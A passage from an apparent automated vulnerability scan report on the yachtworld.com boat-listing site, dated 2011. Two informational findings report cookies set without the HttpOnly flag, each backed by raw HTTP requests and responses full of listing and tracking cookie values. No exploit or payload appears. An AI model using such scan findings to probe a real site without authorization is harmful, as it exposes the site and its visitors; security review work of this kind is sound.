latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:50 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 27 Jan 2011 17:33:34 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:49 GMT
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.64. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:50 GMT
VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:50 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 20 Jan 2011 19:08:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:50 GMT
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.65. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:51 GMT
VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
